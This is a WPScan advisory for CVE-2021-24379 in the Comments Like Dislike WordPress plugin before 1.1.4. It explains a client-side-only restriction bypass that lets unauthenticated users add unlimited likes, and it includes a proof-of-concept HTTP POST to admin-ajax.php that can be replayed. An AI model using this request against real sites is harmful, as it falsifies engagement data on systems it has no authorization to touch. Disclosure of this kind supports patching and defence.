WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact
WPScan
How it worksPricing
Vulnerabilities
WordPressPluginsThemesStatsSubmit vulnerabilities
For developers
StatusAPI detailsCLI scanner
Contact

WordPress Plugin Vulnerabilities

Comments Like Dislike < 1.1.4 - Add Like/Dislike Bypass

Description

The plugin allows users to like/dislike posted comments, however does not prevent them from replaying the AJAX request to add a like. This allows any user (even unauthenticated) to add unlimited like/dislike to any comment. The plugin appears to have some Restriction modes, such as Cookie Restriction, IP Restrictions, Logged In User Restriction, however, they do not prevent such attack as they only check client side

v1.1.3 fixed the issue for the Logged In User Restriction mode, but not the others. v1.1.4 fixed it for the remaining affected modes.

Proof of Concept

Capture the request made when adding a like to a comment, and replay the request

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 73
Connection: close

comment_id=6&action=cld_comment_ajax_action&type=like&_wpnonce=a772faf68b 

Affects Plugins

comments-like-dislike
Fixed in version 1.1.4

References

CVE
CVE-2021-24379

Classification

Type

BYPASS

Miscellaneous

Original Researcher

Phu Tran from techlabcorp.com

Submitter

Phu Tran

Verified

Yes

WPVDB ID
aae7a889-195c-45a3-bbe4-e6d4cd2d7fd9

Timeline

Publicly Published

2021-06-07 (about 1 years ago)

Added

2021-06-07 (about 1 years ago)

Last Updated

2021-08-10 (about 12 months ago)

Our Other Services

WPScan WordPress Security Plugin
WPScan

Vulnerabilities

WordPressPluginsThemesOur StatsSubmit vulnerabilities

About

How it worksPricingWordPress pluginNewsContact

For Developers

StatusAPI detailsCLI scanner

Other

PrivacyTerms of serviceSubmission termsDisclosure policyPrivacy Notice for California Users
jetpackIn partnership with Jetpack
githubtwitterfacebook
Angithubendeavor
Work With Us